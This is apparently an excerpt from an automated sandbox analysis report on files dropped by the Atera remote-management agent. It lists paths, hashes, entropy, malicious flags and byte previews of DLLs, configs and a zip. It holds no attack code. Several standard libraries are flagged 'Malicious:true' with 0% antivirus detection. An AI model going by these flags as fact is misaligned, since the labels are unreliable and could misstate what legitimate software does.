                                                                                                                                                                                                                                                                                                                                  SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                                                                                                                  SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                                                                                                                  SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXWp:WBc
                                                                                                                                                                                                                                                                                                                                  MD5:DFDD2EB77BBB74518BAD98519A857D41
                                                                                                                                                                                                                                                                                                                                  SHA1:5F4F91D73EA620CDF0E5AC458E80B71412B1BB9F
                                                                                                                                                                                                                                                                                                                                  SHA-256:7655078305CC5B4F62569EF9868E1B04FCC491D33FDAD1F8E4610C038BCBAC8D
                                                                                                                                                                                                                                                                                                                                  SHA-512:481CDA97C03294EBAB036F99727828983C8D0E4C137AF05FDEA7FD296D11378904BACCE2D58D44F932A0BF7F2A30A9B44F4CBC05E253F132B1EF641F648C8DF0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=23.8

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.300719339270839
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:5i8fXCGsSVh/2ixXxKFArYCJdshn9xvlOaEpYinAMxCuMr:5FaM2gS1y2F9Ob7HxCr
                                                                                                                                                                                                                                                                                                                                  MD5:9467F653980C1C37E4C64811BA27C976
                                                                                                                                                                                                                                                                                                                                  SHA1:68130FABBB50EAF5CFE2C355BA13B303DD373FB6
                                                                                                                                                                                                                                                                                                                                  SHA-256:821847799A2B7B3A6EC20BA61388AC87707D9C6865BD904A44DE5B033BD2EF29
                                                                                                                                                                                                                                                                                                                                  SHA-512:E72B7802256053589D889B2B7E74A2B53F328289A12CC0D4930D66410D00585C67B2C434512473CD2E74C8F2CB7685C2C34FCFC3DBA4A52399532CEB04153597
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ..............................t.....`.................................2...O.......................0(..........@...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................f.......H...........x.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):96816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1801131806578455
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:hJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwx:hQUm2H5KTfOLgxFJjE50vksVUfPvCI
                                                                                                                                                                                                                                                                                                                                  MD5:F1B2303DD7E152BA70F3537EDB2E9638
                                                                                                                                                                                                                                                                                                                                  SHA1:7E359D4B9011449DABB7F8236F14851A346B5028
                                                                                                                                                                                                                                                                                                                                  SHA-256:8EE8B304339B6F87E79B117F605375AFFFCBABA290A1B41BB6B3C1A40E46767C
                                                                                                                                                                                                                                                                                                                                  SHA-512:A4DD48F1AFF528DADF9974ADA1740CE785823FB584F55191D008158FCFB11F9ADAD8EFF992B8FF761058706C1717E28FBC9C337CF39D4EE4FFAA529501CB3188
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................l.....`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):499760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.056862695710082
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:HXv781Hpx+GfCdLr/jd9yyeEAHweiPofdyz7qd352SW8CdykAfqO:/76BfC5avfdyvc2SN
                                                                                                                                                                                                                                                                                                                                  MD5:3CE7E73DB6F575A0D382DDAA8E1A3C10
                                                                                                                                                                                                                                                                                                                                  SHA1:031C13652C540CA7F798D141D7C3333FB1C71618
                                                                                                                                                                                                                                                                                                                                  SHA-256:692185C37DB7505250E58CC55D6707FCB099315A7FF319A9CC92FD99C5F0EEA7
                                                                                                                                                                                                                                                                                                                                  SHA-512:5270E772613864BD223F31F89CFA500E56E7863967C58C503F92E193AF8C8CAF934B7755868EC21585A38E8D6D186A2DC5528A805A62A0BFA56B59E6506BFF81
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,..........." ..0..p............... ........... ....................................`.................................?...O....................x..0(..........t...T............................................ ............... ..H............text....n... ...p.................. ..`.rsrc................r..............@..@.reloc...............v..............@..B................s.......H.......(d...(...........................................................{J...*..{K...*V.(L.....}J.....}K...*...0..A........u;.......4.,/(M....{J....{J...oN...,.(O....{K....{K...oP...*.*.*. 8..z )UU.Z(M....{J...oQ...X )UU.Z(O....{K...oR...X*...0..b........r...p......%..{J......%q>....>...-.&.+...>...oS....%..{K......%q?....?...-.&.+...?...oS....(T...*2.(U...oV...*..-.rE..psW...z.(U....oX...oV...*:...(....(Y...*:...(....(Y...*N..{Z....o...+(Y...*z.{[....{Z....{\....s]...(^...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960733432365752
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:bBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUk:bBjk38WuBcAbwoA/BkjSHXP36RMGt
                                                                                                                                                                                                                                                                                                                                  MD5:2A9525F27730CBF9E7145AADE4CDA830
                                                                                                                                                                                                                                                                                                                                  SHA1:A6A99E02599656DE1C7F51B02C84BBA8AAE0346D
                                                                                                                                                                                                                                                                                                                                  SHA-256:29D0073080509DB7F3F20C47980A1347CC4139C5F2E26C9C160AE67CE5EECB6E
                                                                                                                                                                                                                                                                                                                                  SHA-512:DDDEEC7AA9D3F9E6187718564AE1A447FCAB12EC2DCBD26EDD87217B4815C274A6BAF90A027766FCC94815C762ED9BFA8D0DEF6C1B2F84279DED9C66852D381E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ...... .....`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):277040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190626027944278
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:rSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYA:suQlBAMW0BvltxZ6B
                                                                                                                                                                                                                                                                                                                                  MD5:4ECF017FD71CC84A4CBAB7507B8634BE
                                                                                                                                                                                                                                                                                                                                  SHA1:2343F37490F9A11F5F0878A1553F0FAF504FE062
                                                                                                                                                                                                                                                                                                                                  SHA-256:871D9403D045F94FC433907E49B68894764FCAF81E12FBDE2AC7A08642DDA32C
                                                                                                                                                                                                                                                                                                                                  SHA-512:5FCB9BDA9C857BA1AD2EC0B19AD109AC54BAC91B8F8F00968560623C8AFD01FAEE1078F7C76010C7526A37C46EE0DB74A0E0DB151186F8FB220105F7091FA69B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............'... ...@....... ..............................>.....@..................................&..O....@..L...............0(...`.......%..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................&......H.......L[......................`%......................................^.{....,.(:...z..}.....*^.{....,.(:...z..}.....*"..(?...*"..(@...*...0..,.......sp......}........q...s7...sj....{.....(....*.0..-.......sr......}........s...s7....ss....{.....(....*....0..(.......st......}........u...s7.....{.....(....*.0..'.......sv......}........w...s7...sj.....(....*B...ss.....(....*......(....*.0..'.......sx......}........y...s7...sj.....(....*F...ss......(....*....0..Z..........}....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):149552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.059724018456156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:o/S+nps5/3oat9QrwQmUgs0giOBDQntBBGBBKBUkBBXBBgBBFBUABU1BB0BBBBgB:o/S+nps5/3f9Qrdd5EtBBGBBKBUkBBXh
                                                                                                                                                                                                                                                                                                                                  MD5:2FF31980FD256EF1B1E143D4699BB727
                                                                                                                                                                                                                                                                                                                                  SHA1:608A21DA2B243E63DAD9E36EE84BC38C921F8E77
                                                                                                                                                                                                                                                                                                                                  SHA-256:F34AD6FB7847A85ADBE1492C783233A8A32BB5E96972FA3738538CE20513F682
                                                                                                                                                                                                                                                                                                                                  SHA-512:2FEF83A7668D190297863592FBBC8E766042067138C3A163771CDCF1FB284BC8162EA6B7B958CB076B6AB654216B855324AE292F78931C47EDC33B52376943AD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.R..........." ..0..............3... ...@....... ...............................5....`..................................2..O....@............... ..0(...`.......1..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................2......H.......H....1..................81.......................................0..S........-.r...ps!...zs".....o#.....g...%.. .o$......+......(%...,...o&.....X....i2..o'...*..0...........-.r...ps!...zs".....s(.....~o...%-.&~n.........s)...%.o...(...+o+....+X.o,.....(-...-.r...pr...ps....z..o/...&.o0....3(.o1... ....(2.....(3...,....o&.....o4....o5...-....,..o6.....o0...,.rK..pr...ps....z.o'...*.......F.d.......z.-.r...ps!...z.(7....-. o8...*..0..U........-.r...ps!...zs9........+ ..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.334370226233819
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Bn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCw:BnvXYcIh6yFIFBYpc47Hxn
                                                                                                                                                                                                                                                                                                                                  MD5:A964D6B5F323E343E884A1E4EBBA21A3
                                                                                                                                                                                                                                                                                                                                  SHA1:41FEA32C2FCC56070CF904AB441019F963C83ED5
                                                                                                                                                                                                                                                                                                                                  SHA-256:0214D2C78CC1DBE92853305FA12119BBE09EA06B5EB9C4B4E7AD76B6FAF232ED
                                                                                                                                                                                                                                                                                                                                  SHA-512:3E93C094D3B9D77BAE9C1725B452743FDFA0A20EB07FFC50EA861C501821710A2C29197CF43DCEC1BF089A5BC9B8F2BF57F9FD0EC8D9805D00E32538D03CD46C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):73264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.955083228632948
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:R784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRX:R7N1r9KGI04CCARLX
                                                                                                                                                                                                                                                                                                                                  MD5:FA432B69828C0F175E44B367AF91ED2D
                                                                                                                                                                                                                                                                                                                                  SHA1:C0E72D5C64E9B560311EBD1EC3A35CED46386C78
                                                                                                                                                                                                                                                                                                                                  SHA-256:6718AFA55EF89805B69360C9E88347A39CC302AB3C16590E78136C20DB025613
                                                                                                                                                                                                                                                                                                                                  SHA-512:E0C54D9126C557C24013486A31D5477EFF2B800ADAE472C3103EE1F1CD527546E6DCEFB19D5DCE602AEE6DA7A0290F413CE2C6C09DF28D4333C4E62510FE2064
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`............@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1246506
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999702247108497
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Ony3ipTOpSfZauTZ0OH58yGrxiVj3WqHvYfUmanGGJFE:OnaSOpGoud0OHGliZWqH3bn/E
                                                                                                                                                                                                                                                                                                                                  MD5:E74D2A16DA1DDB7F9C54F72B8A25897C
                                                                                                                                                                                                                                                                                                                                  SHA1:32379AF2DC1C1CB998DC81270B7D6BE054F7C1A0
                                                                                                                                                                                                                                                                                                                                  SHA-256:A0C2F9479B5E3DA9D7A213EBC59F1DD983881F4FC47A646FFC0A191E07966F46
                                                                                                                                                                                                                                                                                                                                  SHA-512:52B8DE90DC9CA41388EDC9AE637D5B4CE5C872538C87CC3E7D45EDCF8EFF78B0F5743AB4927490ABDA1CFF38F2A19983B7CCC0FE3F854B0EACCA9C9CE28EDA75
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-.....=O(Y..>.........3...AgentPackageMarketplace/AgentPackageMarketplace.exe....0.......>N......V.^.'....l....f.u*-Dl._.>.u.S.Pl-6.;...].#.S.X..7./...."...Z.....M.$`.,..{....v...B.Q.M7.j4.'.C.G`<s.X.%.....,...<bdR....N....!.$J@.k...55....>1..(P&..-.#p.NwuV=Wb...a....-....q.!.s.LH..(...:..#7...L.7.$6.C.uy....&I.r..e...,w0o.....`.....[.{cg=]..IBiQq.`.X.D.h.......G./..NA.....46....w.....b9rp.J.C*.2.F.....G...~..q.x....u......l..I..b..z..w..v.d!./..U.Y^..J..k<kUo:.n:.W......g$..<.X.>....rQ.5JiJ.+..|.p......C......o/...K......T.....+9..z.."..Yd.f..&.B..QWu.-.@...c4.T.^...#.E...v...B..\.x0..{..."|.a.?.y.......-..W.........8nk.).$sf.2].c>...`....=...0..$.bp...Oh....8x.-.%N/...w.........i....a.QX0.k..k..f..D.vl.f.Q..3....]....$.4..k..y.../...'...a..C.x...@..".8....9...;..&j..G#f......).....l......Y..7.c....PJ...X...^)s[...{.......Jr.Q..+....N.F.I...%OS...=.......5......i....h..(....r..T-ir.=.+.'..'.......r...[..J...l.P....[.q...,.To..h.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):37936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.42035670242574
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:GlK72yzFcoUzzxYeHTxwx6/ufD/EpYinAMxCoG:3e9YeHVwYe47Hx6
                                                                                                                                                                                                                                                                                                                                  MD5:EFB4712C8713CB05EB7FE7D87A83A55A
                                                                                                                                                                                                                                                                                                                                  SHA1:C94D106BBA77AECF88540807DA89349B50EA5AE7
                                                                                                                                                                                                                                                                                                                                  SHA-256:30271D8A49C2547AB63A80BC170F42E9F240CF359A844B10BC91340444678E75
                                                                                                                                                                                                                                                                                                                                  SHA-512:3594955AD79A07F75C697229B0DE30C60C2C7372B5A94186A705159A25D2E233E398B9E2DC846B8B47E295DCDDD1765A8287B13456C0A3B3C4E296409A428EF8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!............."...0..`............... ........@.. ..............................P.....`.................................Q...O....................l..0(...........~..8............................................ ............... ..H............text...._... ...`.................. ..`.rsrc................b..............@..@.reloc...............j..............@..B........................H....... 5...I...........................................................0..H........(......}......}......~D...%-.&~C.....j...s....%.D...(...+}.......}....*.0.._........{....-.r...ps....z.{....o.....i./2.{....r+..pr...p.{....o....(....(....o.............{....o........:...%.. ..o...........i.0..+......{.....o....-2.{....r...pr...p.{....o....(....(....o............{.....o.....o....o .....-.....ws....%.{....o!...o"...%.{....o#...o$...%.o.......E...{....%-.&.+.(....%-.&.+..(...+

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1295
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.018953579697613
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdArdEtPF7NhOXrRH2/BLVv+13vH2/nVQ7uH2/FV0PH2/+w39y:3Ar+z7O7Rgdp+1/gnSagFsg+w3w
                                                                                                                                                                                                                                                                                                                                  MD5:843D2196B96E53ABCAE6F4C243D1A7A6
                                                                                                                                                                                                                                                                                                                                  SHA1:EB28441616660FD53653999595A3309961AA9A54
                                                                                                                                                                                                                                                                                                                                  SHA-256:175C1EBF4B5C56563944E65C9E8AE4595730155D69854499DB638E82E16DF056
                                                                                                                                                                                                                                                                                                                                  SHA-512:2C24DA122963E1BF533FD8A5C841C9BCD86442E0E49D3BE379FBB21AA607FDC6C7D30BA5573615416D55538429652BF1108D88EC8267FDC5D8C8F9ECAF11D0A1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
